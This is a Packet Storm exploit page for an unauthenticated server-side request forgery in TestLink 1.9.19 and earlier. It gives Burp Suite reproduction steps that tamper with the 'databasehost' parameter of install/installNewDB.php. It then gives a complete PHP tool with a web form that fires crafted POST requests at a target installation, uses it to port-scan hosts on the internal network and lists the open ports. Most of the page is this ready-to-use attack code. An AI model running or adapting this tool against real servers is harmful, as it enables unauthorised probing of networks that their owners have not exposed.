what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

TestLink 1.9.19 Server-Side Request Forgery

TestLink 1.9.19 Server-Side Request Forgery
Posted Jun 3, 2019
Authored by Manish Tanwar

TestLink versions 1.9.19 and below suffers from a server side request forgery vulnerability.

tags | exploit
SHA-256 | 4135c5cf334226208cc17b50f9d53094a3a71aef0f049cd1dbf262a2fcbfaf8a

TestLink 1.9.19 Server-Side Request Forgery

Change Mirror Download
##################################################################################################
#Exploit Title : TestLink (version <= 1.9.19) Server Side Request Forgery
#Author : Manish Kishan Tanwar AKA error1046
#Vendor Link : http://testlink.org
#Love to : zero cool,Team indishell,Mannu,Viki,Hardeep Singh,Incredible,Kishan Singh and ritu rathi
#Discovered At : Indishell Lab
##################################################################################################

/////////////////////////
//Vulnerability OverView
/////////////////////////

TestLink (version <= 1.9.19) is vulnerable to Un-Autheticated Server-Side Request Forgery (SSRF) which allow an attacker to perform Network device Port
scanning. Device may be the same which is hosting Testlink code or it may be connected to the same network.
This issue exists in script "install/installNewDB.php" and affected parameter is "databasehost".


Steps to Reproduce:
===================
1. Configure your web browser with any proxy software (i am using Burp Suite).
2. Access below mentioned URL in web browser and click "Continue" button:
http://localhost/testlink-1.9.19/install/installCheck.php?licenseOK=on
3. Turn on Burp Interception.
4. Now, in web browser, fill relevant information in input fields (Database admin login/Password etc) and click "Process TestLink Setup" button.
5. In Burp proxy, send the intercepted request to Burp Repeater tab by pressing "CTRL+R" key combination.
6. Switch to Burp Repeater tab and change the value of HTTP Post Parameter "databasehost" from "localhost" to "localhost:22" (if your machine is Linux and SSH running on it), click "Go" button in Burp Repeater.
7. Application response will appear in Burp repeater response tab, which will beshowing that "MySQL server has gone away".
8. Now, change the value of "databasehost" from "localhost:22" to "localhost:1337", click "Go" button in Burp Repeater.
9. Application will respond with HTTP response having SQL server error message "A connection attempt failed because the connected party did not properly respond after a period of time, or established connection failed because connected host has failed to respond".

//////////////////////////
//Exploit code starts here
//////////////////////////

<?php
set_time_limit(0);
/*coded by Manish Kishan Tanwar @indishell lab (http://mannulinux.org) */

$head = '

<html>

<head>

<link href="https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcTLfLXmLeMSTt0jOXREfgvdp8IYWnE9_t49PpAiJNvwHTqnKkL4" rel="icon" type="image/x-icon"/>

</script>

<title>--==[[Indishell forever]]==--</title>

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">


<STYLE>

body {
background: url("https://raw.githubusercontent.com/incredibleindishell/sqlite-lab/master/images/head.jpg");
background-size: 100% 700px;

font-family: Tahoma;

color: white;



}


input {

border : solid 2px ;

border-color : black;

BACKGROUND-COLOR: #444444;

font: 8pt Verdana;


color: white;

}


submit {

BORDER: buttonhighlight 2px outset;

BACKGROUND-COLOR: Black;

width: 30%;

color: #FFF;

}


#t input[type=\'submit\']{

COLOR: White;

border:none;

BACKGROUND-COLOR: black;

}


#t input[type=\'submit\']:hover {



BACKGROUND-COLOR: #ff9933;

color: black;



}

tr {

BORDER: dashed 1px #333;

color: #FFF;

}

td {

BORDER: dashed 0px ;

}

.table1 {

BORDER: 0px Black;

BACKGROUND-COLOR: Black;

color: #FFF;

}

.td1 {

BORDER: 0px;

BORDER-COLOR: #333333;

font: 7pt Verdana;

color: Green;

}

.tr1 {

BORDER: 0px;

BORDER-COLOR: #333333;

color: #FFF;

}

table {

BORDER: dashed 2px #333;

BORDER-COLOR: #333333;

BACKGROUND-COLOR: #191919;;

color: #FFF;

}

textarea {

border : dashed 2px #333;

BACKGROUND-COLOR: Black;

font: Fixedsys bold;

color: #999;

}

A:link {

border: 1px;

COLOR: red; TEXT-DECORATION: none

}

A:visited {

COLOR: red; TEXT-DECORATION: none

}

A:hover {

color: White; TEXT-DECORATION: none

}

A:active {

color: white; TEXT-DECORATION: none

}

</STYLE>

<script type="text/javascript">

<!--

function lhook(id) {

var e = document.getElementById(id);

if(e.style.display == \'block\')

e.style.display = \'none\';

else

e.style.display = \'block\';

}

//-->

</script>

';




echo $head ;

echo '


<table width="100%" cellspacing="0" cellpadding="0" class="tb1" >





<td width="100%" align=center valign="top" rowspan="1">

<font color=#ff9933 size=5 face="comic sans ms"><b>--==[[ TestLink </font><font color=white size=5 face="comic sans ms"><b>SSRF </font><font color=green size=5 face="comic sans ms"><b> Exploit POC]]==--</font><br>
<font color=#ff9933 size=3 face="comic sans ms"><b>--==[[ With </font><font color=white size=3 face="comic sans ms"><b>Love From IndiShell</font><font color=green size=3 face="comic sans ms"><b> Crew]]==--</font>
<div class="hedr">


<td height="10" align="left" class="td1"></td></tr><tr><td

width="100%" align="center" valign="top" rowspan="1"><font

color="red" face="comic sans ms"size="1"><b>

<font color=#ff9933>

##########################################</font><font color=white>#############################################</font><font color=green>#############################################</font><br><font color=white>

-==[[Greetz to]]==--</font><br> <font color=#ff9933>zero cool, code breaker ica, root_devil, google_warrior,INX_r0ot, Darkwolf indishell, Baba, Silent poison India, Magnum sniper, ethicalnoob Indishell, cyber warrior, Anurag, Hacker Fantastic and rest of TEAM INDISHELL<br>

<font color=white>--==[[Love to]]==--</font><br># My Father, my Ex Teacher, cold fire hacker, Mannu, ViKi, Jagriti, Hardeep Singh, Ashu bhai ji, Rafay Baloch, Soldier Of God, Shafoon, Rehan Manzoor, almas malik, Bhuppi, Mohit, Ffe ^_^, Govind Singh, Shardhanand, Budhaoo, Don(Deepika kaushik) and D3 <br>



<b>

<font color=#ff9933>

##########################################</font><font color=white>#############################################</font><font color=green>#############################################</font>



</table>

</table> <br>


';

?>
<div align=center>
<table width="60%" cellspacing="0" cellpadding="0" class="tb1" style="border: 0px; background-color: transparent; ">
<tr><td width="80%" align=center style="padding: 10px; background-color: #191919; opacity: 0.6;">

<form method="POST" >
Target URL: <input style="width: 200px;" type=text name=url value="http://target/testlink_base_dir/">
<br><br>
Ports to be scan: <input type=text name=ports value="21,445,1433,3389">

&nbsp &nbsp
Host to be scan: <input type=text name=host value="Host or IP">

</td></tr><tr>
<td width="40%" align=center style="padding: 10px;">
<input type="submit" value="Billu, Spread the magic" name="own_it"/></form>
</td></tr></table>


<?php

function bas_jugad($lu,$host,$p0rt,$timeout)
{

$payload="isNew=1&databasetype=mysql&databasehost=$host:$p0rt&databasename=testlink3&tableprefix=box3&databaseloginname=indishell&databaseloginpassword=tost&tl_loginname=root&tl_loginpassword=";

$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $lu);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_TIMEOUT, $timeout);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.8) Gecko/2009032609 Firefox/3.0.8');
curl_setopt ($ch, CURLOPT_POST, 1);
curl_setopt ($ch, CURLOPT_POSTFIELDS, "$payload");
curl_setopt ($ch, CURLOPT_FOLLOWLOCATION, 1);
$result = curl_exec ($ch);
curl_close ($ch);


return $result;

}



if(isset($_POST['own_it']))
{
$url_auth=trim($_POST['url']).'/install/installNewDB.php';
$list=$_POST['ports'];
$h0st=trim($_POST['host']);

///////////////////////////////
///Check if host is up or not
///////////////////////////////
$test_port = '31337';
$t_out='100';


$check = bas_jugad($url_auth,$h0st,$test_port,$t_out);
//print_r(strstr($check,'php_network_getaddresses'));


if(!(strstr($check,'php_network_getaddresses'))=='')

{

echo "<script>alert('Target is unreachable, Get me something working :|');</script><br>";

die();
}

////////////////////////////
///Time to get back to work
///////////////////////////

else
{

echo "<script>alert('Target is reachable, I am rolling out =)) ');</script><br>";



if(!(strstr($list,","))=='')
{

$all_ports=array();
$ch = array();
$content = array();
$open = array();
$closed = array();

$all_ports=explode(',',$list);
$n_time='5';

$t1 = microtime(true);
$mh = curl_multi_init();

$i = 0;

foreach($all_ports as $port)

{

$payload="isNew=1&databasetype=mysql&databasehost=$h0st:$port&databasename=testlink3&tableprefix=box3&databaseloginname=indishell&databaseloginpassword=tost&tl_loginname=root&tl_loginpassword=";

$ch[$i] = curl_init();
curl_setopt($ch[$i], CURLOPT_URL, $url_auth);
curl_setopt($ch[$i], CURLOPT_HEADER, 0);
curl_setopt($ch[$i], CURLOPT_TIMEOUT, 5);
curl_setopt($ch[$i], CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch[$i], CURLOPT_POST, 1);
curl_setopt($ch[$i], CURLOPT_POSTFIELDS, $payload);

curl_multi_add_handle($mh, $ch[$i]);
$i ++;
}

$active = null;
do
{
$mrc = curl_multi_exec($mh, $active);
usleep(200000); // limit requests for a while
} while ($active);



$i = 0;
foreach ($ch AS $i => $c)
{
$content[$i] = curl_multi_getcontent($c);
curl_multi_remove_handle($mh, $c);
}

curl_multi_close($mh);

for($j=0;$j < count($content);$j++)
{

if(!(strstr($content[$j],'refused'))=='')
{
// echo "Port $all_ports[$j] is closed<br>";

}

else
{
//echo "port $all_ports[$j] is open 8-)<br>";
array_push($open,$all_ports[$j]);
}



}

echo '<table width="50%" cellspacing="0" cellpadding="0" class="tb1" >
<tr><td align=center style="padding: 10px; background-color: black; opacity: 0.9;"><font color=#ff9933>--==[[ Open Ports on Target server '.$h0st.' ]]==--</font></td></tr>';

foreach($open as $in_open)

{

echo '<tr><td align=center style="padding: 3px; background-color: black; opacity: 0.9;"><font color="white">Port '.$in_open.'</font></td></tr>';

}
echo '</table>';



}
else
{

}
}




}

echo "<font size=5 face=\"comic sans ms\" style=\"left: 0;bottom: 0; position: absolute;margin: 0px 0px 5px;\">Developed By 1046 at <font color=#ff9933>IndiShell Lab</font>";

?>

/////////////////////
//Exploit code end
/////////////////////

--==[[ Greetz To ]]==--

Guru ji zero, code breaker ica, root_devil, google_warrior, INX_r0ot, Darkwolf indishell, Baba,
Silent poison India, Magnum sniper, ethicalnoob Indishell, Reborn India, L0rd Crus4d3r, cool toad,
Hackuin, Alicks, mike waals, cyber gladiator, Cyber Ace, Golden boy INDIA, d3, rafay baloch, nag256
Ketan Singh, AR AR, saad abbasi, Minhal Mehdi, Raj bhai ji, Hacking queen, Bikash Dash

--==[[Love to]]==--

My Father, my Ex Teacher, cold fire hacker, Mannu, ViKi, Ashu bhai ji, Soldier Of God, Bhuppi, Gujjar PCP
Mohit, Ffe, Shardhanand, Budhaoo, Jagriti, Salty, Hacker fantastic, Jennifer Arcuri and Don(Deepika kaushik)
Login or Register to add favorites

File Archive:

June 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jun 1st
    0 Files
  • 2
    Jun 2nd
    0 Files
  • 3
    Jun 3rd
    18 Files
  • 4
    Jun 4th
    21 Files
  • 5
    Jun 5th
    0 Files
  • 6
    Jun 6th
    57 Files
  • 7
    Jun 7th
    6 Files
  • 8
    Jun 8th
    0 Files
  • 9
    Jun 9th
    0 Files
  • 10
    Jun 10th
    12 Files
  • 11
    Jun 11th
    27 Files
  • 12
    Jun 12th
    38 Files
  • 13
    Jun 13th
    16 Files
  • 14
    Jun 14th
    0 Files
  • 15
    Jun 15th
    0 Files
  • 16
    Jun 16th
    0 Files
  • 17
    Jun 17th
    0 Files
  • 18
    Jun 18th
    0 Files
  • 19
    Jun 19th
    0 Files
  • 20
    Jun 20th
    0 Files
  • 21
    Jun 21st
    0 Files
  • 22
    Jun 22nd
    0 Files
  • 23
    Jun 23rd
    0 Files
  • 24
    Jun 24th
    0 Files
  • 25
    Jun 25th
    0 Files
  • 26
    Jun 26th
    0 Files
  • 27
    Jun 27th
    0 Files
  • 28
    Jun 28th
    0 Files
  • 29
    Jun 29th
    0 Files
  • 30
    Jun 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close